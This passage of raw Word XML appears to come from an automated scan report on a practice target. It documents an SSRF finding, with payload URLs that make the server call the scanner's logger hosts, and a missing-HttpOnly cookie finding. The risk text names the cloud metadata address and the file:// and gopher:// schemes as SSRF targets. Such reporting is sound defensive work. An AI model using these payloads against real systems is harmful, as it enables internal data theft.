            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EB9C14D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="063A962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687E0DC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CA2001"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payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>http://25979911277719046700.taaIqJBO4h.bgGkxqapaY.ptt-logger.net</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>page query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> triggered a DNS lookup to one of our DNS loggers: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>taaIqJBO4h.bgGkxqapaY.ptt-logger.net</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. The DNS lookup was for a record of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>AAAA</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> type coming from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>109.74.192.20</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId64">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="109F8DE5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2934"/>
        <w:gridCol w:w="6916"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="54F549B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4134C5A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03650173"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65">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/fi/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="17FAD9F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1196FAE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27DE58A1"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56BFC55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D891C39" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="600C665C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3A1CD10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602865B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E90C2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Injecting the payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>https://ptt-logger.net/l/taaIqJBO4h/?id=86171792048808892490</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>page query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> triggered an HTTP request to one of our HTTP loggers: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>https://ptt-logger.net/l/taaIqJBO4h/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. The request came from the IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>178.79.134.182</w:t>
            </w:r>
            <w:r>
              <w:t>.We received the following HTTP headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId66">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7C85003F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListBullet"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Host: ptt-logger.net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1567724A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListBullet"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>X-Forwarded-For: 178.79.134.182</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C984F09" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListBullet"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E8CD62E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="7C01A994" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3912B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target application is affected by a Server Side Request Forgery (SSRF) vulnerability. SSRF is a vulnerability that allows a user to force the backend server to initiate HTTP requests to arbitrary URLs specified in the input parameters. We have detected this vulnerability by supplying URLs to our HTTP handlers to the server and confirming that we have received the expected request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7508F1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4FC16" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The risk exists that a remote attacker could read or submit data to HTTP endpoints found in predefined locations. For example, applications hosted on cloud providers like </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">AWS, Digital Ocean, and Oracle Cloud can make unauthenticated requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://169.254.169.254/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to receive metadata. Other examples of services providing HTTP APIs on internal IPs are Elasticsearch, Prometheus, and Grafana.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            Additionally, the backend framework might support requests over other protocols, like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ftp://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gopher://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which may extend the attack surface. For example, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protocol might be used to retrieve documents from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7BF79" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32693297" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We recommend rewriting the vulnerable code to allow requests only to specific URLs (whitelist approach). Blacklists are usually ineffective, as there is a myriad of ways to bypass them. Furthermore, disable support for any unwanted protocols, like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ftp://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:t>. Lastly, internal services should be protected by authentication and authorization mechanisms, thus applying a defense-in-depth approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C69616" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45788B8E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C8E9DF4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="464E6B8A"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14B55F83"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9805510" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4C2F09" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="539FAEE2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1DE601" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0D7DCB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId69">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-918</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="33841558" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300501A6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B1D0636" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId70">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A10 - Server-Side Request Forgery</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D338EA2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3C97F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85F583" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A287D7A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.8 Insecure cookie setting: missing HttpOnly flag </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1700CD8B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6297D2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27673FB6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="3F03FCAA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A89B791" wp14:editId="40543009">
                  <wp:extent cx="1397000" cy="1397000"/>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5424A0B9" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14DA016D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="0A75615B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C36A9AF"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2321"/>
        <w:gridCol w:w="1854"/>
        <w:gridCol w:w="5675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="75FD265E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78185532" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="588948F6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cookie Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C0F17E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0F99B423" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB5DBD0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId71">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABE712F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PHPSESSID, security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570901DF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>The server responded with Set-Cookie header(s) that does not specify the HttpOnly flag:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Set-Cookie: PHPSESSID=0c91ce65c9d194f858f04aa98f3fee35</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Set-Cookie: security=low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId72">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16A05A51" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5805D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We found that a cookie has been set without the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag, which means it can be accessed by potentially malicious JavaScript code running inside the web page. The root cause for this usually revolves around misconfigurations in the code or server settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A2655" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D6DB6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that an attacker who injects malicious JavaScript code on the page (e.g. by using an XSS attack) can access the cookie and can send it to another site. In case of a session cookie, this could lead to session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F16A911" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360FC18" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Ensure that the HttpOnly flag is set for all cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3F56A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DAD566" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId73">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/HttpOnly</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A39877E"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5865C0C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C0FB3A8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="716C076C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0C780107" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A2815E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F49C785" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId74">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-1004</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6F510A62" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72CC167F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8805BE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId75">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="709411F9" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="130852EE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41623B91" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId76">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B8277A9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735987C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
